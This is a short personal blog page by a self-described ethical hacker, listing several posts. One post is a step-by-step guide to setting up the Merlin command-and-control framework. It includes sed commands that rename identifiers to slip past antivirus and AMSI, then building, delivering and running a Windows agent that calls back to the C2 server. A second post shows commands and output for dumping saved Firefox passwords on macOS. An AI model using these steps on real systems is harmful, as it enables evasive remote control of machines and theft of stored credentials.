Hi there, my name is Joost van ‘t Zand. This page serves as a bit of an overview of me and my online presence. I am currently working as an ethical hacker.
Projects
Blog posts
-
Test_page
-
C2 Using Merlin
To use Merlin, a Command & Control server written in Go, take the following steps:

    go version    # version should be 1.13 or higher
    apt update && sudo apt install golang-go
    git clone https://github.com/Ne0nd0g/merlin && cd merlin

    ## Now replace ExecuteShell for MiniMice to trick virusscanners and AMSI
    ## and also hide Ne0nd0g for AMSI, as this is the developer
    find . -name '*.go' -type f -print0 | xargs -0 sed -i 's/ExecuteShell/MiniMice/g'
    find . -name '*.go' -type f -print0 | xargs -0 sed -i 's/executeShell/miniMice/g'
    find . -name '*.go' -type f -print0 | xargs -0 sed -i 's/github.com\/Ne0nd0g\/merlin/github.com\/mini\/heyho/g'
    sed -i 's/github.com\/Ne0nd0g\/merlin/github.com\/mini\/heyho/g' go.mod

    ## Create an output directory and build the Merlin agent
    make agent-windows DIR="./output"

    ## Start the Merlin server listener
    go run cmd/merlinserver/main.go -i 0.0.0.0 -p 8443 -psk strongPassphraseWhaterYouWant

    ## Run a python HTTP Server to copy the Merlin agent to the Windows system
    cd /mnt/tools/merlin/output/
    python -m SimpleHTTPServer 80

    ## Run the Merlin agent on the Windows host
    merlinAgent-Windows-x64.exe -url https://172.16.216.135:8443 -psk strongPassphraseWhaterYouWant

    [+]New authenticated agent checkin for a0c86f61-4f21-4e63-9856-b73d7b8fbf3a

    ## Now we can interact with the agent:
    interact a0c86f61-4f21-4e63-9856-b73d7b8fbf3a
    help
    ls
    info
    cmd whoami

-
Deploying Gophish In Docker With Terraform And Aws
Here is a video about how to deploy Gophish in a Docker container on a VPS in AWS that is deployed using Terraform.
-
Dump Firefox Credentials On Macos
Dumping the credentials stored in the Firefox browser cache on macOS is possible using the following commands:

    git clone https://github.com/unode/firefox_decrypt
    cd firefox_decrypt
    python firefox_decrypt.py

    Select the Firefox profile you wish to decrypt
    1 -> Profiles/1v42l6gf.dev-edition-default
    2 -> Profiles/cunynfjm.default
    2

    Master Password for profile /Users/myuser/Library/Application Support/Firefox/Profiles/cunynfjm.default:
    2019-11-11 14:13:18,813 - WARNING - Attempting decryption with no Master Password

    Website:   https://www.hackthebox.eu
    Username: '<username>'
    Password: '******'

    Website:   http://webmail.mijndomein.nl
    Username: '<username>'
    Password: '******'

    Website:   https://www.t-mobile.nl
    Username: '<username>'
    Password: '******'

-
Welcome To My Blog
Welcome… You’ll find this post in your _posts directory. Go ahead and edit it and re-build the site to see your changes. You can rebuild the site in many different ways, but the most common way is to run jekyll serve, which launches a web server and auto-regenerates your site when a file is updated.

To add new posts, simply add a file in the _posts directory that follows the convention YYYY-MM-DD-name-of-post.ext and includes the necessary front matter. Take a look at the source for this post to get an idea about how it works.

Jekyll also offers powerful support for code snippets:

    def print_hi(name)
      puts "Hi, #{name}"
    end
    print_hi('Tom')
    #=> prints 'Hi, Tom' to STDOUT.

Check out the Jekyll docs for more info on how to get the most out of Jekyll. File all bugs/feature requests at Jekyll’s GitHub repo. If you have questions, you can ask them on Jekyll Talk.